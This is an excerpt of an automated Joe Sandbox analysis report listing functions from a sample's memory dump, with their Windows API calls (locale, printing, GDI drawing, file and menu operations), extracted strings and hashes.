Part of subcall function 0040787C: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040789A

Part of subcall function 004078C8: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,00407ACA,00000000,00407C7C,?,?,?,?,00000000), ref: 004078DB

Strings

:mm:ss, xrefs: 00407C4A
t&, xrefs: 00407B31
F&, xrefs: 00407A6A
:mm, xrefs: 00407C30
X&, xrefs: 00407A93
m/d/yy, xrefs: 00407B1D
mmmm d, yyyy, xrefs: 00407B3F
AMPM, xrefs: 00407C19
f&, xrefs: 00407B01

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID: InfoLocale$DefaultSystem
String ID: AMPM$:mm$:mm:ss$F&$X&$f&$m/d/yy$mmmm d, yyyy$t&
API String ID: 1044490935-1991603454
Opcode ID: 15534dace64b905b0f5b4f4a10107124d9b9de165240b0c61fa291fac3a6cb4c
Instruction ID: ef8c2368ed5cbe600ca3e73d6d3363e46c2ccc6b70e5ab03d23c9122ce235ba6
Opcode Fuzzy Hash: 15534dace64b905b0f5b4f4a10107124d9b9de165240b0c61fa291fac3a6cb4c
Instruction Fuzzy Hash: FF513035F081446BD701EBAA9C41B8E7BA9DB99344F50C47BB501BB7C6CA3CEA05871E

Function 00410910 Relevance: 16.7, APIs: 11, Instructions: 180memoryCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32(?), ref: 00410952
GlobalFree.KERNEL32(?), ref: 0041095B
GlobalLock.KERNEL32(?), ref: 0041096A
74AC5F50.WINSPOOL.DRV(?,00000000,00410B0B,?,00000000,00000000,00000000,?,00410E9E,00000000,00000000), ref: 0041098D
74AD6000.WINSPOOL.DRV(?,?,00000000,?,00000000,00000000,00000000,?,00410E9E,00000000,00000000), ref: 00410A6B
74AD46F0.WINSPOOL.DRV(00000000,?,?,?,?,00000000,?,?,00000000,?,00000000,00000000,00000000,?,00410E9E,00000000), ref: 00410A94
GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,?,?,00000000,?,?,00000000,?,00000000,00000000,00000000), ref: 00410A9C
GlobalLock.KERNEL32(00000000), ref: 00410AAB
74AD46F0.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002,00000042,00000000,00000000,?,?,?,?,00000000,?,?), ref: 00410AC3
GlobalUnlock.KERNEL32(00000000), ref: 00410AD0
GlobalFree.KERNEL32(00000000), ref: 00410AD9

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID: Global$FreeLockUnlock$AllocD6000.F50.
String ID:
API String ID: 1659144427-0
Opcode ID: 33e746b28a0a78096c13ccb1a5f9a48e818938a9e5c65d79c11c9701a44b18f6
Instruction ID: fa57b30f8d82266e5d7b6adb21a308637165e1aa69e01a46e75393e56b16b716
Opcode Fuzzy Hash: 33e746b28a0a78096c13ccb1a5f9a48e818938a9e5c65d79c11c9701a44b18f6
Instruction Fuzzy Hash: 68512CB1A00214AFDB10DF69C881BDA77E9AF48314F1141AAF908DB346DAB8DDC0CB59

Function 004175E8 Relevance: 15.2, APIs: 10, Instructions: 167windowCOMMON

Download Yara Rule

APIs

RectVisible.GDI32(?,?), ref: 0041767B
SaveDC.GDI32(?), ref: 0041768F
IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 004176B2
RestoreDC.GDI32(?,?), ref: 004176CD
CreateSolidBrush.GDI32(00000000), ref: 0041774D
FrameRect.USER32(?,?,?), ref: 00417780
DeleteObject.GDI32(?), ref: 0041778A
CreateSolidBrush.GDI32(00000000), ref: 0041779A
FrameRect.USER32(?,?,?), ref: 004177CD
DeleteObject.GDI32(?), ref: 004177D7

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID: Rect$BrushCreateDeleteFrameObjectSolid$ClipIntersectRestoreSaveVisible
String ID:
API String ID: 375863564-0
Opcode ID: d49546202a14e2f8b8f17197973093c8e0e8fc5225f1ee98ef0a5412e69d35e5
Instruction ID: 687a4895b7be4a51e9f4b3ab71f5a44ccb131249cc1e1b525ed89bba9f1cf7cf
Opcode Fuzzy Hash: d49546202a14e2f8b8f17197973093c8e0e8fc5225f1ee98ef0a5412e69d35e5
Instruction Fuzzy Hash: B4514BB16086456FCB40EF29C8C0B9B77E8AF48314F15556AED48CB287C738EC81CB99

Function 00403FF7 Relevance: 15.1, APIs: 10, Instructions: 122fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 0040407E
GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 004040A2
SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 004040BE
ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 004040DF
SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00404108
SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00404112
GetStdHandle.KERNEL32(000000F5), ref: 00404132
GetFileType.KERNEL32(?,000000F5), ref: 00404149
CloseHandle.KERNEL32(?,?,000000F5), ref: 00404164
GetLastError.KERNEL32(000000F5), ref: 0040417E

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
String ID:
API String ID: 1694776339-0
Opcode ID: 61c699108d9feeb7c690b24939b9977b7f14ec4b03899e9d86e50d71160d3312
Instruction ID: d78d345db352a361fd9c0709de4dde621eafe16894e5dcafa79df78e65a155da
Opcode Fuzzy Hash: 61c699108d9feeb7c690b24939b9977b7f14ec4b03899e9d86e50d71160d3312
Instruction Fuzzy Hash: CB4193B01007019AE7306F24C809B6376E5EB90754F208A3FE3E6FA6E1D77DA885875D

Function 00424B2C Relevance: 15.1, APIs: 10, Instructions: 74windowCOMMON

Download Yara Rule

APIs

GetSystemMenu.USER32(00000000,00000000), ref: 00424B77
DeleteMenu.USER32(00000000,0000F130,00000000,00000000,00000000), ref: 00424B95
DeleteMenu.USER32(00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00424BA2
DeleteMenu.USER32(00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00424BAF
DeleteMenu.USER32(00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00424BBC
DeleteMenu.USER32(00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000), ref: 00424BC9
DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000), ref: 00424BD6
DeleteMenu.USER32(00000000,0000F120,00000000,00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000), ref: 00424BE3
EnableMenuItem.USER32(00000000,0000F020,00000001), ref: 00424C01
EnableMenuItem.USER32(00000000,0000F030,00000001), ref: 00424C1D

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID: Menu$Delete$EnableItem$System
String ID:
API String ID: 3985193851-0
Opcode ID: 3593dde6bd8cd9015ab0a53addab509e56f0817380240735029515cb5401dae6
Instruction ID: e2067588fca68c990de2e634206d4a679f564428dd66e26377f61d5a9c5d4af4
Opcode Fuzzy Hash: 3593dde6bd8cd9015ab0a53addab509e56f0817380240735029515cb5401dae6
Instruction Fuzzy Hash: 1E2141703417047AE720EA29CC8BF9A7AD89F04749F4454A5BB447F2D3C6FCA9808A58

Function 00497514 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 258windowCOMMON

Download Yara Rule

APIs

PostMessageA.USER32(00000000,00000400,00000000,00000000), ref: 00497599

Part of subcall function 0042BA20: SendMessageA.USER32(00000000,0000014E,00000000,00000000), ref: 0042BA36

Part of subcall function 00441A34: SendMessageA.USER32(00000000,00000467,00000000,00000000), ref: 00441AC3

Strings

000, xrefs: 004978AE
N/, xrefs: 00497549, 00497557, 00497565, 00497570
%3.3d, xrefs: 00497696
%4.4d, xrefs: 004976C1
XXX, xrefs: 004975F5, 00497621
XXXX, xrefs: 00497612, 00497643
ticalSection, xrefs: 0049753B, 004976A0, 0049774F, 00497796, 004977A8, 004977B2, 00497820

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID: Message$Send$Post
String ID: %3.3d$%4.4d$000$N/$XXX$XXXX$ticalSection
API String ID: 3628032766-1035410740
Opcode ID: f84d9f49789b35abde2a361c72f36479d819e60dc74989b67c7a75a122e5a6e7
Instruction ID: 92518abb68560f3f2279e8bdbd7a6c3964a14833b20f067881a61fa1a4b2a525
Opcode Fuzzy Hash: f84d9f49789b35abde2a361c72f36479d819e60dc74989b67c7a75a122e5a6e7
Instruction Fuzzy Hash: 70C14E74A151058FDF40EF69C485B99BBF5EF44304F2480B6EC08AB366DB38AD44CB69

Function 004145A4 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 107COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 004145F2
GetDesktopWindow.USER32 ref: 004146AA

Part of subcall function 0041A1F0: 74F109A0.COMCTL32(00000000,?,004146DA,?,?,?,?,004143B7,00000000,004143CA), ref: 0041A20C
Part of subcall function 0041A1F0: ShowCursor.USER32(00000001,00000000,?,004146DA,?,?,?,?,004143B7,00000000,004143CA), ref: 0041A229

SetCursor.USER32(00000000,?,?,?,?,004143B7,00000000,004143CA), ref: 004146E8

Strings

z+, xrefs: 004145C4, 004145EC
:+, xrefs: 0041462A
l+, xrefs: 004145B3, 004145F9
N+, xrefs: 00414633

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID: CursorDesktopWindow$F109Show
String ID: :+$N+$l+$z+
API String ID: 2299471310-2407545877
Opcode ID: 797a5f5df44a54e5a6747d12ecdbbccee454581eb809650e359fa02170b03749
Instruction ID: 10b69be04b7ef51df3c9d45b30e4845a46adb063dd8973214ccafab01f61feb0
Opcode Fuzzy Hash: 797a5f5df44a54e5a6747d12ecdbbccee454581eb809650e359fa02170b03749
Instruction Fuzzy Hash: D1410E75A00110AFC704EF69E985B9A3FE5AB8B308B14847AE544CB365D63CEC85CF5D

Function 00444A40 Relevance: 13.7, APIs: 9, Instructions: 216COMMON

Download Yara Rule

APIs

DrawEdge.USER32(00000000,?,00000008,00000003), ref: 00444AAD
DrawEdge.USER32(00000000,?,00000002,0000000C), ref: 00444ABB
DrawEdge.USER32(00000000,00000000,00000002,00000803), ref: 00444AD8
DrawEdge.USER32(00000000,?,00000001,0000000C), ref: 00444AEB
DrawEdge.USER32(00000000,?,00000004,00000003), ref: 00444AFF
DrawEdge.USER32(00000000,00000000,00000004,0000080C), ref: 00444B16

Part of subcall function 0041C5DC: Rectangle.GDI32(?,?,?,?,?), ref: 0041C60A

InflateRect.USER32(00000000,000000FF,000000FF), ref: 00444BB9
InflateRect.USER32(00000000,000000FF,000000FF), ref: 00444BE5

Part of subcall function 0041C87C: SetPixel.GDI32(?,?,?,00000000), ref: 0041C8AB

Part of subcall function 0041C5A4: Polyline.GDI32(?,?,00000003), ref: 0041C5C8

OffsetRect.USER32(?,00000001,00000001), ref: 00444CA0

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID: DrawEdge$Rect$Inflate$OffsetPixelPolylineRectangle
String ID:
API String ID: 2112064845-0
Opcode ID: 180d9d5feaf7b9397758ecee20241a75d09311c89ddecf2708b2dd19088694bc
Instruction ID: 66905215fe3639e76e0a8151ee85ecc38a7e803c08cbe415d8028091517b2c91
Opcode Fuzzy Hash: 180d9d5feaf7b9397758ecee20241a75d09311c89ddecf2708b2dd19088694bc
Instruction Fuzzy Hash: 11710070A40209ABDB00EEA9DD81FEFB7B5EF44304F10452AF911B7292D674DE45CB65

Function 0041C188 Relevance: 13.7, APIs: 9, Instructions: 176windowCOMMON

Download Yara Rule

APIs

SetBkColor.GDI32(?,00000000), ref: 0041C265
73EA4D40.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020,?,00000000), ref: 0041C29F
SetBkColor.GDI32(?,?), ref: 0041C2B4
StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00CC0020), ref: 0041C2FE
SetTextColor.GDI32(00000000,00000000), ref: 0041C309
SetBkColor.GDI32(00000000,00FFFFFF), ref: 0041C319
StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00E20746), ref: 0041C358
SetTextColor.GDI32(00000000,00000000), ref: 0041C362
SetBkColor.GDI32(00000000,?), ref: 0041C36F

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID: Color$StretchText
String ID:
API String ID: 2984075790-0
Opcode ID: af1672f91e5207c968c71888e7fb09e6d411d0c0dc7a73beaa5689f9a11ff09f
Instruction ID: aa39217e82b94130f6defadd11467c94d56b2db65105c56cff5f7afd5d57b169
Opcode Fuzzy Hash: af1672f91e5207c968c71888e7fb09e6d411d0c0dc7a73beaa5689f9a11ff09f
Instruction Fuzzy Hash: 4B61D575600505AFCB50EFA9DDC5E9AB7F9AF08304B1481AAF918DB252C734ED41CB68

Function 00401A70 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 59COMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.KERNEL32(\$,00000000,00401B48), ref: 00401A9D
LocalFree.KERNEL32(000A25BC,00000000,00401B48), ref: 00401AAF
